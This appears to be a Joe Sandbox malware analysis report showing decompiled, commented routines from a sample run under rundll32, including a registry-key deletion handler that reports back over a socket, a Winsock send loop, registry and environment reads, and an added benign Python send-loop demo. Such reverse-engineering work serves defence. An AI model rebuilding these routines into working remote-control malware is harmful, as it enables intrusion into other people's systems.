                                                             				void* _t32;
                                                             				long _t33;
                                                             				void* _t45;
                                                             				void* _t46;
                                                             				char* _t49;
                                                             				intOrPtr* _t53;
                                                             				short* _t55;
                                                             				void* _t56;
                                                             				int _t57;
                                                             
                                                             				_t45 = __ebx;
                                                             				_t56 = _a8;                  /* payload length */
                                                             				_t53 = _a4 + 1;              /* skip the first payload byte */
                                                             				_v16 = __ecx;                /* this */
                                                             				_v24 = _t53;
                                                             				_v20 = 0;
                                                             				_t29 = _t56 - 1 + _t53;      /* end of payload */
                                                             				_v28 = _t29;
                                                             				if(_t29 - _t53 >= 4) {
                                                             					_a8 =  *_t53;            /* 4-byte field, reused below as the root HKEY */
                                                             					_v24 = _t53 + 4;
                                                             				} else {
                                                             					_v20 = 1;                /* payload too short: flag the error */
                                                             					_a8 = 0;
                                                             				}
                                                             				_t49 =  &_v28;
                                                             				_t32 = E04640D20(_t49);      /* extracts a wide string (the key path) at the cursor */
                                                             				_t55 = _t32;
                                                             				if(_v20 == 0) {
                                                             					_push(_t45);
                                                             					_t33 = _t56 + 4;
                                                             					_v12 = _t33;
                                                             					_t46 = LocalAlloc(0x40, _t33);         /* LPTR: zeroed buffer of length + 4 */
                                                             					E0465E060(_t46, _a4, _t56);            /* copies the original payload into it (memcpy-like) */
                                                             					_v8 = _t46 + _t56;                     /* the result byte goes right after the echoed payload */
                                                             					_t57 = 0;
                                                             					_a4 = 0;
                                                             					/* 0x20106 = KEY_WRITE | KEY_WOW64_64KEY */
                                                             					if(RegOpenKeyExW(_a8, _t55, 0, 0x20106,  &_a4) == 0) {
                                                             						/* recursive delete of the subkey named by the wide string at 0x467c5d0 */
                                                             						SHDeleteKeyW(_a4, 0x467c5d0);
                                                             						asm("sbb esi, esi");               /* decompiler residue of how the result flag is derived */
                                                             						_t57 = 1;
                                                             						RegCloseKey(_a4);
                                                             					}
                                                             					_push(_t49);
                                                             					_push(0x3f);
                                                             					_push(_v12);
                                                             					 *_v8 = _t57;                          /* success flag appended to the echoed payload */
                                                             					_push(_t46);
                                                             					E04631C60( *((intOrPtr*)(_v16 + 4)));  /* buffer, length and id 0x3f go to the object at this+4 (looks like the reply path) */
                                                             					_t32 = LocalFree(_t46);
                                                             					if(_t55 != 0) {
                                                             						/* L04655B0F releases the string; it pairs with the L04655B55 allocator seen in E04640C60 below */
                                                             						return L04655B0F(_t55);
                                                             					}
                                                             				}
                                                             				return _t32;
                                                             			}

                                                            0x046411e0
                                                            0x046411ea
                                                            0x046411ed
                                                            0x046411ef
                                                            0x046411f2
                                                            0x046411f8
                                                            0x046411ff
                                                            0x04641201
                                                            0x04641209
                                                            0x04641220
                                                            0x04641223
                                                            0x0464120b
                                                            0x0464120b
                                                            0x04641212
                                                            0x04641212
                                                            0x04641226
                                                            0x04641229
                                                            0x04641232
                                                            0x04641234
                                                            0x0464123a
                                                            0x0464123b
                                                            0x04641241
                                                            0x0464124e
                                                            0x04641251
                                                            0x0464125c
                                                            0x0464125f
                                                            0x04641264
                                                            0x0464127a
                                                            0x04641284
                                                            0x0464128f
                                                            0x04641291
                                                            0x04641292
                                                            0x04641292
                                                            0x0464129b
                                                            0x0464129f
                                                            0x046412a1
                                                            0x046412a4
                                                            0x046412a9
                                                            0x046412aa
                                                            0x046412b0
                                                            0x046412b9
                                                            0x00000000
                                                            0x046412c1
                                                            0x046412b9
                                                            0x046412c9

                                                            APIs
                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 04641244
                                                            • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,00020106,?), ref: 04641272
                                                            • SHDeleteKeyW.SHLWAPI(?,0467C5D0), ref: 04641284
                                                            • RegCloseKey.ADVAPI32(?), ref: 04641292
                                                            • LocalFree.KERNEL32(00000000,00000000,?,0000003F), ref: 046412B0
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                             • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$AllocCloseDeleteFreeOpen
                                                            • String ID:
                                                            • API String ID: 3791902735-0
                                                            • Opcode ID: 69534b692a9a8caa521a4eba161ad0fcc394766e3f75c15aa950536f04354d68
                                                            • Instruction ID: b210272c4c066c4c9f28322db703f7b1602286cef05315a7c5e14284efdb47a0
                                                            • Opcode Fuzzy Hash: 69534b692a9a8caa521a4eba161ad0fcc394766e3f75c15aa950536f04354d68
                                                            • Instruction Fuzzy Hash: 97314FB5900218EBDF14DFA4DC48AEE7BB8EF45714F14812AF90AE7241F775AA50CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 58%
                                                             			/* Decompiled from the memory dump (quality 58%). The comments are
                                                             			   editorial interpretation. __ecx is a connection object: +0x1c holds
                                                             			   the SOCKET, +0x2c the maximum bytes per send() call, +0x14c a
                                                             			   CRITICAL_SECTION guarding a pending-byte counter at +0x180, and
                                                             			   +0xc/+0x10/+0x14/+0x18 receive error state. _a4 is a buffer
                                                             			   descriptor whose +0x14 is the read cursor and +0x18 the end pointer;
                                                             			   *_a8 is set when the socket would block. __imp__#19 and __imp__#111
                                                             			   are WS2_32 ordinals 19 and 111, i.e. send and WSAGetLastError (see
                                                             			   the API list below). Two declarations (_t46, _t53) and the implicit
                                                             			   eax results were missing from the decompiler output and are added. */
                                                             			E0464F770(intOrPtr* __ecx, intOrPtr _a4, intOrPtr* _a8) {
                                                             				intOrPtr _t31;
                                                             				intOrPtr* _t43;
                                                             				intOrPtr _t45;
                                                             				intOrPtr _t46;
                                                             				intOrPtr _t48;
                                                             				intOrPtr _t49;
                                                             				intOrPtr _t50;
                                                             				struct _CRITICAL_SECTION* _t51;
                                                             				intOrPtr _t52;
                                                             				intOrPtr _t53;
                                                             
                                                             				_t50 = _a4;
                                                             				_t43 = __ecx;
                                                             				if( *((intOrPtr*)(_t50 + 0x18)) ==  *((intOrPtr*)(_t50 + 0x14))) {
                                                             					L5:
                                                             					return 1;                                    /* nothing left to send */
                                                             				} else {
                                                             					do {
                                                             						_t49 =  *((intOrPtr*)(_t50 + 0x14));         /* cursor */
                                                             						_t45 =  *((intOrPtr*)(_t43 + 0x2c));         /* per-call chunk limit */
                                                             						_t31 =  *((intOrPtr*)(_t50 + 0x18)) - _t49;  /* bytes remaining */
                                                             						/* the decompiler dropped the operands of this comparison; the
                                                             						   pattern is min(remaining, chunk limit) */
                                                             						_t46 = (_t31 < _t45) ? _t31 : _t45;
                                                             						_t31 = __imp__#19( *((intOrPtr*)(_t43 + 0x1c)), _t49, _t46, 0);   /* send(sock, cursor, len, 0) */
                                                             						_a4 = _t31;
                                                             						if(_t31 <= 0) {
                                                             							if(_t31 == 0xffffffff) {                     /* SOCKET_ERROR */
                                                             								_t31 = __imp__#111();                    /* WSAGetLastError() */
                                                             								if(_t31 != 0x2733) {                     /* 0x2733 = WSAEWOULDBLOCK (10035) */
                                                             									 *((intOrPtr*)(_t43 + 0x14)) = _t31;     /* record the Winsock error */
                                                             									 *((intOrPtr*)(_t43 + 0xc)) = 1;
                                                             									 *((intOrPtr*)(_t43 + 0x10)) = 3;
                                                             									 *((intOrPtr*)(_t43 + 0x18)) = 1;
                                                             									return 0;                            /* hard failure */
                                                             								} else {
                                                             									 *_a8 = 1;                               /* would block: tell the caller to retry later */
                                                             									return 1;
                                                             								}
                                                             							} else {
                                                             								goto L4;                                 /* send() returned 0: try again */
                                                             							}
                                                             						} else {
                                                             							_t51 = _t43 + 0x14c;
                                                             							EnterCriticalSection(_t51);
                                                             							 *((intOrPtr*)(_t43 + 0x180)) =  *((intOrPtr*)(_t43 + 0x180)) - _a4;   /* pending-byte counter */
                                                             							LeaveCriticalSection(_t51);
                                                             							SetLastError(0);
                                                             							_t52 = _a4;
                                                             							/* virtual call through the vtable slot at 0x84 with (cursor, bytes sent) */
                                                             							 *((intOrPtr*)( *_t43 + 0x84))( *((intOrPtr*)(_t50 + 0x14)), _t52);
                                                             							_t48 =  *((intOrPtr*)(_t50 + 0x14));
                                                             							/* advance the cursor by min(remaining, sent); comparison operands lost as above */
                                                             							_t53 = ( *((intOrPtr*)(_t50 + 0x18)) - _t48 < _t52) ?  *((intOrPtr*)(_t50 + 0x18)) - _t48 : _t52;
                                                             							 *((intOrPtr*)(_t50 + 0x14)) = _t48 + _t53;
                                                             							goto L4;
                                                             						}
                                                             						goto L9;
                                                             						L4:
                                                             					} while ( *((intOrPtr*)(_t50 + 0x18)) !=  *((intOrPtr*)(_t50 + 0x14)));
                                                             					goto L5;
                                                             				}
                                                             				L9:
                                                             				;
                                                             			}


                                                            0x0464f776
                                                            0x0464f779
                                                            0x0464f781
                                                            0x0464f801
                                                            0x0464f808
                                                            0x0464f783
                                                            0x0464f783
                                                            0x0464f783
                                                            0x0464f789
                                                            0x0464f78c
                                                            0x0464f792
                                                            0x0464f79a
                                                            0x0464f7a0
                                                            0x0464f7a5
                                                            0x0464f7f5
                                                            0x0464f80b
                                                            0x0464f816
                                                            0x0464f82e
                                                            0x0464f834
                                                            0x0464f83b
                                                            0x0464f842
                                                            0x0464f84b
                                                            0x0464f818
                                                            0x0464f81e
                                                            0x0464f82a
                                                            0x0464f82a
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0464f7a7
                                                            0x0464f7a7
                                                            0x0464f7ae
                                                            0x0464f7b7
                                                            0x0464f7be
                                                            0x0464f7c6
                                                            0x0464f7cc
                                                            0x0464f7d7
                                                            0x0464f7dd
                                                            0x0464f7e7
                                                            0x0464f7ed
                                                            0x00000000
                                                            0x0464f7ed
                                                            0x00000000
                                                            0x0464f7f7
                                                            0x0464f7fa
                                                            0x00000000
                                                            0x0464f783
                                                            0x00000000

                                                            APIs
                                                            • send.WS2_32(?,?,?,00000000), ref: 0464F79A
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 0464F7AE
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 0464F7BE
                                                            • SetLastError.KERNEL32(00000000,?,?,0464F6B6,?,00000000), ref: 0464F7C6
                                                            • WSAGetLastError.WS2_32(?,?,0464F6B6,?,00000000), ref: 0464F80B
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                             • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalErrorLastSection$EnterLeavesend
                                                            • String ID:
                                                            • API String ID: 421069059-0
                                                            • Opcode ID: fde1bb43af05b46fed64f53366cd6e8ef867d437baf9fe2a45569f7d5da14863
                                                            • Instruction ID: 83f5c12f7c3d1b17a21006220b31ead00e43989512ff1ce74d78780c86e5aa53
                                                            • Opcode Fuzzy Hash: fde1bb43af05b46fed64f53366cd6e8ef867d437baf9fe2a45569f7d5da14863
                                                            • Instruction Fuzzy Hash: 5C217136200505AFDB04CF6DE888A99BBB9FF58320F104266F809CB240E775F991CBE0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
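The routine E0464F770 is a textbook non-blocking send loop: send at most a fixed chunk, advance the cursor by what actually went out, treat WSAEWOULDBLOCK as "come back later" rather than as a failure, and record anything else as a hard error. The following is an added example, not code from the sample or from the Joe Sandbox report, that implements the same control flow in Python and exercises it offline over a socketpair. The function names (send_pending, drain, demo, hard_error_demo), the 8 MiB payload and the 64 KiB chunk limit are the editor's own choices.

```python
"""Non-blocking send loop in the shape of the decompiled routine E0464F770.

Added example, not code from the sample or from the sandbox report. Names
and the in-process payload are constructed for illustration.
"""
import socket

# Winsock's WSAEWOULDBLOCK (10035), the value the decompiled loop tests for.
# Python folds the platform equivalent (EAGAIN/EWOULDBLOCK, or WSAEWOULDBLOCK
# on Windows) into BlockingIOError, so the constant is informational here.
WSAEWOULDBLOCK = 0x2733


def send_pending(sock, buf, chunk_limit):
    """Send buf in pieces of at most chunk_limit bytes.

    Returns (bytes_sent, status), where status is one of:
      "done"         every byte went out (the routine's `return 1`)
      "would_block"  the socket is full, retry later
                     (the routine's `*_a8 = 1; return 1`)
      OSError        a hard failure (the routine's `return 0` path, which
                     stores the Winsock error code in the object)
    """
    view = memoryview(buf)
    cursor, end = 0, len(view)
    while cursor != end:
        chunk = min(end - cursor, chunk_limit)      # min(remaining, limit)
        try:
            n = sock.send(view[cursor:cursor + chunk])
        except BlockingIOError:
            return cursor, "would_block"
        except OSError as err:
            return cursor, err
        cursor += n                                 # send() may take fewer bytes than asked
    return cursor, "done"


def drain(sock, sink):
    """Read everything currently queued on a non-blocking socket into sink."""
    while True:
        try:
            data = sock.recv(1 << 16)
        except BlockingIOError:
            return
        if not data:
            return
        sink += data


def demo(total=8 << 20, chunk_limit=1 << 16):
    """Constructed exercise: push `total` bytes through a socketpair with a
    non-blocking sender, draining the peer each time the sender would block.

    Returns (bytes_sent, would_block_events, received_payload).
    """
    sender, receiver = socket.socketpair()
    sender.setblocking(False)
    receiver.setblocking(False)
    payload = bytes(range(256)) * (total // 256)    # constructed input
    received = bytearray()
    cursor = 0
    blocked = 0
    try:
        while True:
            sent, status = send_pending(sender, memoryview(payload)[cursor:], chunk_limit)
            cursor += sent
            if status == "done":
                break
            if status != "would_block":
                raise status
            blocked += 1
            drain(receiver, received)       # free buffer space, then resume at cursor
        sender.shutdown(socket.SHUT_WR)     # EOF lets the receiver read to the end
        receiver.setblocking(True)
        while True:
            data = receiver.recv(1 << 16)
            if not data:
                break
            received += data
    finally:
        sender.close()
        receiver.close()
    return cursor, blocked, bytes(received)


def hard_error_demo():
    """Constructed failure: the peer is already closed, so send() fails
    outright instead of blocking. Returns send_pending's (bytes_sent, status)."""
    sender, receiver = socket.socketpair()
    receiver.close()
    sender.setblocking(False)
    try:
        return send_pending(sender, b"x" * 64, 16)
    finally:
        sender.close()


if __name__ == "__main__":
    sent, blocked, data = demo()
    print(f"sent {sent} bytes, would-block events: {blocked}, received {len(data)} bytes")
```

The three-way result mirrors the decompiled routine's contract: both "done" and "would_block" correspond to its `return 1` (the caller distinguishes them through the flag), and only a genuine socket error maps to `return 0`. The pending-byte counter and the virtual call after each successful send have no equivalent here because they belong to the sample's own connection object.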

                                                            C-Code - Quality: 97%
                                                             			/* Decompiled from the memory dump (quality 97%). The comments are
                                                             			   editorial interpretation. The routine opens the key named by __edx
                                                             			   under the HKEY in __ecx (the API list shows HKEY_LOCAL_MACHINE,
                                                             			   0x80000002, at the call site), reads one REG_BINARY value into a
                                                             			   freshly allocated buffer and returns it, storing the size through
                                                             			   _a8. The value name is the wide string at 0467E09C, which the
                                                             			   decompiler renders as "1". Declarations of _t32 and _t36 were
                                                             			   missing from the output and are added. */
                                                             			E04640C60(void* __ecx, short* __edx, char* _a8) {
                                                             				int _v8;          /* cbData */
                                                             				void* _v12;       /* HKEY */
                                                             				int _v16;         /* value type */
                                                             				void* __esi;
                                                             				char* _t19;
                                                             				char* _t22;
                                                             				long _t26;
                                                             				char* _t28;
                                                             				void* _t32;
                                                             				char* _t33;
                                                             				char* _t36;       /* returned buffer */
                                                             
                                                             				_t32 = __ecx;
                                                             				/* 0x20119 = KEY_READ | KEY_WOW64_64KEY */
                                                             				if(RegOpenKeyExW(__ecx, __edx, 0, 0x20119,  &_v12) == 0) {
                                                             					_v8 = 0;
                                                             					_t36 = 0;
                                                             					/* first call with lpData = NULL only sizes the value */
                                                             					_t19 = RegQueryValueExW(_v12, "1", 0,  &_v16, 0,  &_v8);
                                                             					__eflags = _t19;
                                                             					if(_t19 != 0) {
                                                             						L11:
                                                             						RegCloseKey(_v12);
                                                             						return _t36;
                                                             					} else {
                                                             						_t22 = _v8;
                                                             						__eflags = _t22;
                                                             						if(__eflags == 0) {
                                                             							goto L11;                                /* empty value */
                                                             						} else {
                                                             							_push(_t22);
                                                             							_t36 = L04655B55(_t32, 0, __eflags);    /* allocate _v8 bytes (the sample's allocator) */
                                                             							__eflags = _t36;
                                                             							if(_t36 == 0) {
                                                             								goto L11;
                                                             							} else {
                                                             								/* second call fills the buffer */
                                                             								_t26 = RegQueryValueExW(_v12, "1", 0,  &_v16, _t36,  &_v8);
                                                             								__eflags = _t26;
                                                             								if(_t26 != 0) {
                                                             									L10:
                                                             									L04655B0F(_t36);                     /* free the buffer on failure */
                                                             									_t36 = 0;
                                                             									__eflags = 0;
                                                             									goto L11;
                                                             								} else {
                                                             									_t28 = _v8;
                                                             									__eflags = _t28;
                                                             									if(_t28 == 0) {
                                                             										goto L10;
                                                             									} else {
                                                             										__eflags = _v16 - 3;
                                                             										if(_v16 != 3) {                  /* 3 = REG_BINARY; any other type is rejected */
                                                             											goto L10;
                                                             										} else {
                                                             											_t33 = _a8;
                                                             											__eflags = _t33;
                                                             											if(_t33 == 0) {
                                                             												goto L11;
                                                             											} else {
                                                             												 *_t33 = _t28;               /* hand the size back to the caller */
                                                             												RegCloseKey(_v12);
                                                             												return _t36;
                                                             											}
                                                             										}
                                                             									}
                                                             								}
                                                             							}
                                                             						}
                                                             					}
                                                             				} else {
                                                             					return 0;
                                                             				}
                                                             			}

                                                            0x04640c60
                                                            0x04640c7b
                                                            0x04640c87
                                                            0x04640c8f
                                                            0x04640c9f
                                                            0x04640ca5
                                                            0x04640ca7
                                                            0x04640d0d
                                                            0x04640d10

                                                            APIs
                                                            • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,0464966F,?,?), ref: 04640C73
                                                            • RegQueryValueExW.ADVAPI32(?,0467E09C,00000000,?,00000000,?,?), ref: 04640C9F
                                                            • RegQueryValueExW.ADVAPI32(?,0467E09C,00000000,?,00000000,00000000), ref: 04640CD2
                                                            • RegCloseKey.ADVAPI32(?), ref: 04640CF5
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: QueryValue$CloseOpen
                                                            • String ID:
                                                            • API String ID: 1586453840-0
                                                            • Opcode ID: f1f32f9f2c48e639f86438998497a3f1984690cf3d6b82ffb685697306275fc0
                                                            • Instruction ID: 9d8bcb694cac23e15fc17abec35c27698902f370989fae6435f12770f7966c19
                                                            • Opcode Fuzzy Hash: f1f32f9f2c48e639f86438998497a3f1984690cf3d6b82ffb685697306275fc0
                                                            • Instruction Fuzzy Hash: 8D215471A05128BBDF209EA0AC09BAEBB7CEF41615F0441A6ED09E2201F731BA14CA91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 67%
                                                            			E04655A30(void* __ebx, HANDLE* __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                            				signed int _v8;
                                                            				struct tagMSG _v36;
                                                            				signed int _v40;
                                                            				HANDLE* _v44;
                                                            				signed int _t15;
                                                            				signed int _t16;
                                                            				signed int _t17;
                                                            				int _t18;
                                                            				int _t21;
                                                            				void* _t30;
                                                            				long _t34;
                                                            				void* _t40;
                                                            				void* _t43;
                                                            				signed int _t46;
                                                            
                                                            				_t43 = __esi;
                                                            				_t40 = __edi;
                                                            				_t30 = __ebx;
                                                            				_t15 =  *0x4684008; // 0xd355be4e
                                                            				_t16 = _t15 ^ _t46;
                                                            				_v8 = _t16;
                                                            				_t33 = timeGetTime;
                                                            				_v44 = __edx;
                                                            				if(_a4 != 0xffffffff) {
                                                            					_t17 = timeGetTime();
                                                            					_t33 = timeGetTime;
                                                            				} else {
                                                            					_t17 = _t16 | 0xffffffff;
                                                            				}
                                                            				_push(_t30);
                                                            				_push(_t43);
                                                            				_push(_t40);
                                                            				_v40 = _t17;
                                                            				L4:
                                                            				while(1) {
                                                            					do {
                                                            						if(_t17 == 0xffffffff) {
                                                            							_t34 = _t33 | 0xffffffff;
                                                            							goto L9;
                                                            						} else {
                                                            							_t34 = _v40 -  *_t33() + _a4;
                                                            							if(_t34 > 0) {
                                                            								L9:
                                                            								_t18 = MsgWaitForMultipleObjects(1, _v44, 0, _t34, 0x4ff);
                                                            								if(_t18 == 1) {
                                                            									goto L10;
                                                            								}
                                                            							} else {
                                                            							}
                                                            						}
                                                            						return E04655AFE(_v8 ^ _t46);
                                                            						L10:
                                                            						_t21 = PeekMessageW( &_v36, 0, 0, 0, _t18);
                                                            						_t33 = timeGetTime;
                                                            						_t17 = _v40;
                                                            					} while (_t21 == 0);
                                                            					do {
                                                            						TranslateMessage( &_v36);
                                                            						DispatchMessageW( &_v36);
                                                            					} while (PeekMessageW( &_v36, 0, 0, 0, 1) != 0);
                                                            					_t17 = _v40;
                                                            					_t33 = timeGetTime;
                                                            				}
                                                            			}

                                                            APIs
                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,73D244A0,000004FF), ref: 04655AAD
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 04655AC3
                                                            • TranslateMessage.USER32(?), ref: 04655AD6
                                                            • DispatchMessageW.USER32(?), ref: 04655ADC
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 04655AEA
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
                                                            • String ID:
                                                            • API String ID: 2015114452-0
                                                            • Opcode ID: 423902568f5bdda9970b1ff767deecd5af83a0bf8a0241c9f2fcd97749a0fb7e
                                                            • Instruction ID: b3f0bfa844cab245527586d89edac1c35109b37687053b8d9f7510bc7f8d5528
                                                            • Opcode Fuzzy Hash: 423902568f5bdda9970b1ff767deecd5af83a0bf8a0241c9f2fcd97749a0fb7e
                                                            • Instruction Fuzzy Hash: 4C218831641208ABDB18DEA4DC89FED77B8EB48710F101219E912E72D4FA74BC018B65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 93%
                                                            			E0466A67B() {
                                                            				int _v8;
                                                            				void* __ecx;
                                                            				void* _t6;
                                                            				int _t7;
                                                            				char* _t13;
                                                            				int _t17;
                                                            				void* _t19;
                                                            				char* _t25;
                                                            				WCHAR* _t27;
                                                            
                                                            				_t27 = GetEnvironmentStringsW();
                                                            				if(_t27 == 0) {
                                                            					L7:
                                                            					_t13 = 0;
                                                            				} else {
                                                            					_t6 = E0466A644(_t27);
                                                            					_pop(_t19);
                                                            					_t17 = _t6 - _t27 >> 1;
                                                            					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
                                                            					_v8 = _t7;
                                                            					if(_t7 == 0) {
                                                            						goto L7;
                                                            					} else {
                                                            						_t25 = E046684E7(_t19, _t7);
                                                            						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
                                                            							_t13 = 0;
                                                            						} else {
                                                            							_t13 = _t25;
                                                            							_t25 = 0;
                                                            						}
                                                            						E046684AD(_t25);
                                                            					}
                                                            				}
                                                            				if(_t27 != 0) {
                                                            					FreeEnvironmentStringsW(_t27);
                                                            				}
                                                            				return _t13;
                                                            			}

                                                            APIs
                                                            • GetEnvironmentStringsW.KERNEL32 ref: 0466A684
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0466A6A7
                                                              • Part of subcall function 046684E7: RtlAllocateHeap.NTDLL(00000000,00000001,00000004), ref: 04668519
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0466A6CD
                                                            • _free.LIBCMT ref: 0466A6E0
                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0466A6EF
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                            • String ID:
                                                            • API String ID: 336800556-0
                                                            • Opcode ID: 95416ebfdb51718baa28f5fd2180e5e03b8791aafa8fc511d80e467f151cce81
                                                            • Instruction ID: c0807c56dc9c2a8a1baeed3f29d2bdbd191ec58a72ef26d95652b6932f53d9c8
                                                            • Opcode Fuzzy Hash: 95416ebfdb51718baa28f5fd2180e5e03b8791aafa8fc511d80e467f151cce81
                                                            • Instruction Fuzzy Hash: 5D01DF727062957F63212AF65C8CC7B6A6DDED3AA5319012DBD16E7200FEA4AC02D1B4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 22%
                                                            			E0464F850(intOrPtr* __ecx) {
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				intOrPtr _t24;
                                                            				intOrPtr _t25;
                                                            				long _t31;
                                                            				intOrPtr* _t39;
                                                            
                                                            				_t39 = __ecx;
                                                            				_t31 = GetCurrentThreadId();
                                                            				if( *((intOrPtr*)(_t39 + 0x50)) == 3) {
                                                            					L10:
                                                            					 *((intOrPtr*)(_t39 + 0x48)) = 1;
                                                            					SetLastError(0x139f);
                                                            					return 0;
                                                            				} else {
                                                            					E0464EC90(_t39 + 0x148);
                                                            					if( *((intOrPtr*)( *_t39 + 0x24))() == 0) {
                                                            						 *((intOrPtr*)(_t39 + 0x148)) = 0;
                                                            						goto L10;
                                                            					} else {
                                                            						 *((intOrPtr*)(_t39 + 0x50)) = 2;
                                                            						_push(_t31);
                                                            						 *((intOrPtr*)(_t39 + 0x148)) = 0;
                                                            						E0464E8C0(_t31, _t39, _t39);
                                                            						 *((intOrPtr*)(_t39 + 0x4c)) = 0;
                                                            						if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
                                                            							 *((intOrPtr*)( *_t39 + 0x90))( *((intOrPtr*)(_t39 + 0x10)),  *((intOrPtr*)(_t39 + 0x14)));
                                                            						}
                                                            						_t24 =  *((intOrPtr*)(_t39 + 0x20));
                                                            						if(_t24 != 0) {
                                                            							__imp__WSACloseEvent(_t24);
                                                            							 *((intOrPtr*)(_t39 + 0x20)) = 0;
                                                            						}
                                                            						_t25 =  *((intOrPtr*)(_t39 + 0x1c));
                                                            						if(_t25 != 0xffffffff) {
                                                            							__imp__#22(_t25, 1);
                                                            							__imp__#3( *((intOrPtr*)(_t39 + 0x1c)));
                                                            							 *((intOrPtr*)(_t39 + 0x1c)) = 0xffffffff;
                                                            						}
                                                            						 *((intOrPtr*)( *_t39 + 0xb8))();
                                                            						return 1;
                                                            					}
                                                            				}
                                                            			}

                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 0464F855
                                                            • SetLastError.KERNEL32(0000139F,?,00000000,04638135,74D0F5E0,00000000,80004005,80004005,80004005,80004005,80004005,?,04638B27,0467E048,?), ref: 0464F912
                                                              • Part of subcall function 0464EC90: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0464ECA5
                                                              • Part of subcall function 0464EC90: SwitchToThread.KERNEL32(?,?,00000000,0464E712,?,00000000,04638425,74D0F5E0,00000004,80004005,80004005,80004005,80004005,80004005,?,046387F8), ref: 0464ECBD
                                                              • Part of subcall function 0464E8C0: SetEvent.KERNEL32(?,?,04638B6E,0467E024,?), ref: 0464E8E7
                                                              • Part of subcall function 0464E8C0: CloseHandle.KERNEL32(00000000,?,04638B6E,0467E024,?), ref: 0464E90A
                                                            • WSACloseEvent.WS2_32(00000000), ref: 0464F8BB
                                                            • shutdown.WS2_32(?,00000001), ref: 0464F8D3
                                                            • closesocket.WS2_32(?), ref: 0464F8DC
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseEventThread$CompareCurrentErrorExchangeHandleInterlockedLastSwitchclosesocketshutdown
                                                            • String ID:
                                                            • API String ID: 880953794-0
                                                            • Opcode ID: 1d050aa5bf3dd18b7765c987f566bdbb8acba4cf1962ed33e1f81a0a5db1ae14
                                                            • Instruction ID: 7390c6ca60d1fc6a663574ea82937559109a611e5b7b8767cab47da4614bc38d
                                                            • Opcode Fuzzy Hash: 1d050aa5bf3dd18b7765c987f566bdbb8acba4cf1962ed33e1f81a0a5db1ae14
                                                            • Instruction Fuzzy Hash: 43210A70300602AFDB189F65D48CB99BBB6FF84325F144228E019866D0DBB5F865CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 82%
                                                            			E046689B4(void* __ecx) {
                                                            				void* __esi;
